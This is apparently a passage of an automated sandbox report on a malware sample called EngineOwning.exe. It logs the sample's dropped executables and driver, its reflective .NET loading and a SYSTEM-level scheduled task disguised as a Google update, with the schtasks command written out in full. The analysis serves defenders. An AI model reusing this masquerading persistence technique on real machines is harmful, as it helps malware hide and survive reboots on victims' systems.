      Source: C:\ProgramData\winrsdhost.exeUnpacked PE file: 4.2.winrsdhost.exe.50000.0.unpack a%0r0:EW;.text:ER;.rsrc:R; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;
      Source: Client[1].exe.0.dr, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: mdsigstub.exe.0.dr, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 7.2.mdsigstub.exe.2f0000.0.unpack, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 7.0.mdsigstub.exe.2f0000.0.unpack, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 7.0.mdsigstub.exe.2f0000.2.unpack, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 7.0.mdsigstub.exe.2f0000.1.unpack, Client/Connection/ClientSocket.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF7C414 push rbx; ret
      Source: C:\ProgramData\winrsdhost.exeCode function: 4_2_00007FF9F1CD773D push edi; iretd
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_002F6294 push 00000028h; retn 0000h
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_002F626B push 00000028h; retn 0000h
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_002F5FE1 push 00000028h; retn 0000h
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_002F637C push rax; ret
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_002F61D7 push 00000028h; retn 0000h
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF2FC9 push C233C18Bh; ret
      Source: C:\ProgramData\mdsigstub.exeCode function: 7_2_00007FF9F1CF2D35 push ds; retf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9F1CB4FAA push eax; iretd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9F1D8A010 push eax; retf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF9F1D8016F push cs; retf
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00416AC0 push rax; retf 0009h
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_0041644E push rsp; iretd
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00416900 push rax; ret
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00416B00 push rax; retf
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00416C00 push rax; iretd
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D96A9E push es; iretd
      Source: C:\Windows\System32\conhost.exeCode function: 39_2_00007FF9F1D92B36 push esi; ret
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF76CA0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,_RTC_CheckStackVars,
      Source: servicesx86[1].exe.0.drStatic PE information: section name: a%0r0
      Source: winrsdhost.exe.0.drStatic PE information: section name: a%0r0
      Source: services86.exe.4.drStatic PE information: section name: a%0r0

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\ProgramData\mdsigstub.exeJump to dropped file
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\ProgramData\winrsdhost.exeJump to dropped file
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\ProgramData\mdsigstub.exeJump to dropped file
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Client[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
      Source: C:\ProgramData\winrsdhost.exeFile created: C:\Users\user\AppData\Roaming\Windows\services86.exeJump to dropped file
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exeJump to dropped file
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\ProgramData\winrsdhost.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe"
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF6AE80 IsIconic,
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF76CA0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,_RTC_CheckStackVars,
      Source: C:\ProgramData\winrsdhost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\winrsdhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\ProgramData\mdsigstub.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
